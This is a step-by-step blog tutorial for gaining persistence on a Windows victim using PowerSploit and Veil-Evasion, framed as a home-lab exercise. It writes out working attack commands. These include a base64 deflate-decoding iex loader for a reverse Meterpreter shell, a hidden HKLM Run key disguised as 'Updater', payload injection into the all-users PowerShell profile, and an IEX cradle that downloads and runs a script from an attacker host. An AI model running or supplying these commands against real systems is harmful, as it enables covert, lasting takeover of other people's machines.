How to create Persistence with PowerSploit and the Veil Framework. Author: Haydn Johnson Original Content: https://www.fishnetsecurity.com/6labs/blog/how­post­ex­persistence­scripting­powersploit­veil Reason: Due to the new updates in PowerSploit I wanted to give persistence a try. Also the write­up above skips some steps assuming a more knowledgeable audience. There is a simple change in the Persistence Module syntax and as a result I wanted to write this blog. This also acts as detailed notes for myself to come back too. What you will learn: This blog gives a step by step guide to creating persistence with PowerSploit. A reverse shell will be sent to the attacker when a victim logs into their machine. Assumptions: The Veil Framework is installed on a Kali Linux machine. PowerSploit has been downloaded to a windows machine. Basic knowledge on Windows and Unix. Basic understanding of Metasploit, reverse shells etc. Ability to have a connection between Victim and Attacking machines (Vbox/Vmware). The IP addresses that your systems have will most likely be different as I did not create a standard Virtualbox Host only network, please make adjustments to anything you follow. Please note:

The victim machine is used to create the powershell persistence file with PowerSploit, and that is used to infect the victim (same machines).

Ideally, the script would be created on a non­victim machine as a secondary attacking machine. The persistence script would then be executed on a victim machine.

Links: PowerSploit: https://github.com/PowerShellMafia/PowerSploit Veil­Framework:https://www.veil­framework.com/ Lab used for this: VirtualBox Virtualization software Kali Linux 2.0 Windows 7

To give an understanding of the environment the below information is given: Veil Evasion is installed on the Kali Machine:

PowerSploit is saved on the Victim Machine:

The ip address for the Attacking machine is:

The ip address for the Victim machine is:

High Level Steps:

1. Create Payload with Veil 2. Separate the required code for the PowerSploit Persistence Script 3. Use PowerSploit to create the Persistence Script 4. Setup a Listener to catch the Payload 5. Execute the Persistence Script 6. Test the Persistence works

I have also included a ‘manual’ way to do this using the key commands PowerSploit uses, as well as using an IEX cradle to download and execute the script remotely.

Creating the Payload: The first step is to create a payload. We want the victim system to do something when the persistence happens, in this case we are going to create a reverse Meterpreter shell to be sent to the attacking machine. We will use the veil­evasion framework create the Meterpreter shell. The veil­evasion framework will create a bat file that launches a base64 encoded meterpreter, we will use the base64 encoding as part of the powersploit script to create persistence. Run Veil­Evasion:

You should be greeted with this screen:

Create a powershell/meterpreter/rev_https payload:

type ‘use 22’ and the options for the payload will be shown:

Ensure the correct payload is selected.

Set the options with the correct IP address (the Attacking machine):

Type ‘info’ to confirm the correct IP address has been chosen:

Type ‘generate’ to create the payload:

Veil gives two output files: The ‘Payload file’ will be used in the PowerSploit Script. The ‘Handler file’ will be used to create a listener for the reverse shell. The payload has now been created.

Getting the correct code to use from the payload: We have the payload created in the correct format being Base64. However it is also a batch file so that it executes as a batch file, this tutorial does not use the batch file, so it will show how to get the code ready in order to create the persistence script. Browse and open the ‘Payload File’

This ‘Payload File’ is a batch file that can be run in windows to create our shell. There are 2 encoded payloads here. We are going to use the first one. Highlight the first encoded payload and copy and paste it into a text file on its own: This ensures that the whole payload is used PLEASE NOTE:

The last character ‘\’ is supposedly bas64, but for some reason (maybe to do with how PowerShell executes it) it creates an error when PowerShell attempts to execute the command.

This issue shows itself when the persistence executes. Please remove it:

Reminder: remove the last backslash This is the bas64 payload that will be used in the following steps. Move this over to the Victim machine.

On the Victim Machine: We have to create the persistence script using powersploit. This involves importing the persistence module, adding the relevant information needed, including the payload and persistence options. Importing PowerSploit Persistence Module: type ‘Import­Module .\Persistence

This has imported the module, giving access to the Persistence functionality.

Adding the Persistence options: Powersploit has different persistence options, we are going to use it to execute our shell upon logon for an administrator and a normal user: We will use the Add­Persistence cmdlet to create the persistence script, its options are:

The first variable (scriptblock) is going to read in our base64 encoded payload. We will use the following format: $p = iex $(New­Object IO.StreamReader ($(New­Object IO.Compression.DeflateStream ($(New­Object IO.MemoryStream (,$([Convert]::FromBase64String("VEIL_PAYLOAD_HERE")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd() Use a text file and copy and paste the base64 payload into it. You should end up with a text file combing the above command with the VEIL_PAYLOAD_HERE section replaced with the base 64 encoding. Such as the below:

Copy and paste this into PowerShell:

Then echo the variable to confirm it has been created:

The scriptblock is saved as a variable, now set the UserPersistenceOption and ElevatedPersistenceOption to the execute when the user logs on: To do this, create two variables like below and place into a text file: $u = New­UserPersistenceOption ­Registry –AtLogon $e = New­ElevatedPersistenceOption ­Registry –AtLogon

Copy and paste each command (1 by 1) into PowerShell:

Echo the variables to ensure they have been created:

This has set the variables needed for the Add­Persistence cmdlet to create the persistence script.

Create the Persistence Script

Use the Add­Persistence cmdlet to generate the script. The following code will be used: ‘Add­Persistence ­ScriptBlock $p ­ElevatedPersistenceOption $e ­Verbose ­UserPersistenceOption $u ­PassThru’ As shown:

The script has been created. Confirm the persistence script has been created. A persistence and remove persistence script should be in the folder that you ran the command.

The Persistence command creates the persistence and the removePersistence script removes it (as in, it sets back the changes the persistence script made).

Back to the Attacking Machine

Create the Listener for our payload:

In order to receive the payload on our Attacking machine, we must have a listener setup to catch the reverse shell. Navigate in Kali Linux to the location of the handler file:

Open the file in a text editor, as it will be used to create the lister. Launch Metasploit in a terminal: ‘service postgresql start’ ‘msfconsole’

Copy and paste the commands from the handler file into the msfconsole terminal:

Confirm the listener is set up: type ‘jobs’

Now the listener is setup, lets go back to the victim machine and run our persistence script.

Back to the Victim machine

Create the persistence:

As we have the Persistence script created, we simply need to run it.

Your persistence is created (the changes selected have been made to the victim machine).

Confirm the persistence works You can log back in and out, and your should receive a shell.

Another easy way to check is to relaunch powershell. This should send you a shell. This works because the command to execute the shell is run when powershell executes, the command is saved in the AllusersAllhosts profile. To see the AllUsersAllHosts profile: Echo $profile.AllUsers.AllHosts to find the location and then view the file.

Persistence Not Using The PowerSploit Script Having a look at the Persistence Script created by PowerSploit, you can deduce the main commands used to create the persistence. Albeit without the ability to easily add the options you want. This is smaller and quicker if you're in a hurry.

Create the registry item to launch PowerShell upon any user logging on: The peristence chosen, is to edit the registry so that as a user logs on it launches powershell.exe. Execute the following code in PowerShell: New­ItemProperty ­Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ ­Name Updater ­PropertyType String ­Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" ­NonInteractive ­WindowStyle Hidden"

If you wish to confirm this has worked, you are able to look it up in the registry: Under: HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ called updater

<TO ADD: Get­item propery regesitry location>

Add the PAYLOAD to the AllUsersAllHosts profile: When the user logs on, powershell.exe will execute with a default profile. The below will show how to set that profile for All users. Use the below code to add the code to the AllUserAllHosts profile: echo "sal a New­Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.M emoryStream][Convert]::FromBase64String('BASE 64 ENCODED PAYLOAD'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)). ReadToEnd()" | Out­File $PROFILE.AllUsersAllHosts ­Fo

Persistence with an IEX cradle The idea of using an IEX cradle is that if you have remote access you can host your ‘persistence’ script and use powershell to download it and run it in memory. This is to emulate a live attack, this allows you to practice on your own. Using the above knowledge (from PowerSploit), we use 2 commands to create persistence:

1. Setting the registry to launch powershell upon logon 2. setting the default profile to send us a shell

1 ­ New­ItemProperty ­Path HKLM:Software\Microsoft\Windows\CurrentVersion\Run\ ­Name Updater ­PropertyType String ­Value "`"$($Env:SystemRoot)\System32\WindowsPowerShell\v1.0\powershell.exe`" ­NonInteractive ­WindowStyle Hidden" 2­ echo "sal a New­Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.M emoryStream][Convert]::FromBase64String('BASE 64 ENCODED PAYLOAD'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)). ReadToEnd()" | Out­File $PROFILE.AllUsersAllHosts ­Fo

Create the Persistence Script Similar to batch, a PowerShell script execute commands line by line. As a result we simply copy and paste the 2 commands in a .ps1 file and host on our Kali machine.

Host the Script on the Attacking Machine PLEASE NOTE:

I did a lot of testing and you may run into issues if you create the script then move it over to a Linux machine. There are formatting errors when simply moving the file to linux.

You will see the following formatting error:

Instead, open the file on windows and copy paste it into a file in Linux.

The victim needs to be able to download the script, so it will be hosted on the Attacker machine. Copy the file into the /var/www/html directory on Kali Linux 2. Start Apache in Kali: ‘service apache2 start’

Ensure you can access the script hosted on Kali: If unable to access chmod 777 it:

Use the IEX cradle to download and run the remote script: Use the code below linking to your script to allow the victim to download and execute the script: IEX (New­Object Net.WebClient).DownloadString('http://192.168.0.3/persistence_test3.ps1')

Test the persistence works Have your Listener ready on Kali and Reboot

Launch your Victim machine, login

You should receive a shell when you login to the victim machine

Those are the steps for using the IEX cradle.